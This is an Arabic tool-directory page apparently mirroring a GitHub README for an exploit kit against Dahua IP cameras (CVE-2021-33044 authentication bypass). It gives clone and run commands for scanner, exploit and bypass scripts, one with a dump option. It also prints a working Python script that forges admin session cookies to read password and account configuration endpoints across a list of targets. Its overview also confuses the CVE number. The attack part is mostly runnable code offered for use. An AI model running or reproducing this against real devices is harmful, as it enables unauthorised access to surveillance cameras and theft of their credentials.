Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — كاميرا Dahua بحث ثغرة CVE-2021-33044 | Kitploit
أدوات/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
المصادقة والترخيصأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DAHUA_AUTH-BYPASS-CVE-2021-33044

كاميرا Dahua بحث ثغرة CVE-2021-33044

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

محاكاة استغلال ثغرة تجاوز المصادقة في Dahua (CVE-2021-33044)

نظرة عامة

كاميرات Dahua IP هي أجهزة إنترنت الأشياء شائعة الاستخدام في أنظمة المراقبة الأمنية. نظرًا لنشرها بشكل متكرر في الشبكات الداخلية أو الوصول إليها عبر الإنترنت، فإن الثغرات الأمنية في كاميرات IP يمكن أن تؤثر بشدة على الخصوصية وأمن المعلومات.

CVE-2021-33045 هي ثغرة أمنية موجودة في بعض سلاسل كاميرات Dahua، تسمح بالوصول غير المصرح به إلى موارد التهيئة الداخلية دون مصادقة صالحة. تنشأ هذه الثغرة من آلية التحكم في الوصول غير الصارمة في برنامج الجهاز الثابت.

معلومات الثغرة

البندالمحتوى
CVECVE-2021-33044
النوعتجاوز المصادقة
الخطورةحرجة (CVSS ~9.8)
المصادقةلا تتطلب مصادقة
التأثيركاميرات Dahua / DVR / NVR

السبب

تنشأ الثغرة من تصميم مصادقة غير آمن في برنامج كاميرات Dahua الثابت:

  • الخادم لا يتحقق من الجلسة/الرمز بشكل صحيح
  • الثقة في البيانات المرسلة من العميل
  • بعض نقاط النهاية للتكوين الحساسة تتحقق فقط من وجود ملف تعريف الارتباط، لا تتحقق من صلاحية الوصول الفعلية

هذا يسمح للمهاجم بـ:

  • تزوير عملية المصادقة
  • تجاوز تسجيل الدخول بالكامل

المراجع:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

آلية عمل تجاوز المصادقة

التدفق الطبيعي

root@kitploit:~
→ يرسل العميل طلب HTTP مع ملف تعريف ارتباط عشوائي
→ تتحقق الكاميرا من ملف تعريف الارتباط على مستوى الواجهة
→ لا يتم التحقق من صحة الجلسة في النهاية الخلفية
→ يسمح بالوصول المباشر إلى نقاط نهاية التهيئة الداخلية
→ يعيد بيانات حساسة

السيناريوهات

الملف

طريقة الاستخدام

التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

مسح الشبكة

root@kitploit:~
# مسح الشبكة الفرعية (المنافذ مطلوبة)
python dahua_scanner.py https://example.com -p 80 8080 8800

# مضيف واحد مع المنفذ
python dahua_scanner.py https://example.com

المنافذ الشائعة لـ Dahua: 80,443, 8080, 37777, 37778

استغلال ثغرة CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

تجاوز المصادقة

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # تفريغ الجهاز بعد التجاوز

مثال

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

الشرح

  • يستخدم السكريبت مكتبة requests ويقوم بتعطيل تحذيرات SSL بشكل استباقي.

  • الدالة dump_accounts(ip, port=80) هي الدالة الرئيسية المسؤولة عن فحص جهاز كاميرا واحد. الوظائف الرئيسية للدالة هي:

    • بناء URL من عنوان IP والمنفذ
    • محاكاة حالة تسجيل دخول المسؤول عبر ملفات تعريف الارتباط
    • إرسال طلبات إلى نقاط نهاية التهيئة الحساسة
    • تحليل الاستجابة لتحديد ما إذا كان الجهاز متأثرًا أم لا
  • محاكاة ملفات تعريف الارتباط للمصادقة. تستخدم الدالة قيم ملفات تعريف الارتباط مثل:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • في إصدارات الكاميرات المتأثرة، لا يتحقق النهاية الخلفية من sessionID الفعلي، مما يؤدي إلى اعتقاد النظام بأن الطلب قد أُرسل من حساب مسؤول صالح.

حلقة معالجة قائمة الأهداف

يقرأ السكريبت قائمة الأهداف من ملف الإدخال، ويستدعي دالة الفحص لكل جهاز على التوالي. يسمح هذا النهج بتقييم العديد من الكاميرات تلقائيًا.

صورة

عملية التطوير

تم تطوير هذه السكريبتات بناءً على:

  • تفاصيل CVE المنشورة من NVD
  • إخطارات الأمان من Dahua
  • مراجع PoC العامة (seclists.org, packetstormsecurity)

حالة الاختبار:

  • تم تنفيذ منطق تجاوز المصادقة وفقًا لمواصفات CVE
  • اختبار محدود على الأجهزة الضعيفة.

ملاحظات

هذا المشروع:

  • يُستخدم فقط للأغراض التعليمية والبحثية
  • يُرجى تشغيله في بيئة مختبر شخصية
تنزيل الأداة
الغرض
CVEs
dahua_scanner.pyاكتشاف الشبكة — العثور على كاميرات Dahua في الشبكة الفرعيةاكتشاف
dahua_exploit.pyأداة مسح متعددة CVEs — فحص جميع الثغرات الأمنية.الكل
dahua_auth_bypass.pyتجاوز المصادقة المتخصص مع خيار --dumpCVE-2021-33044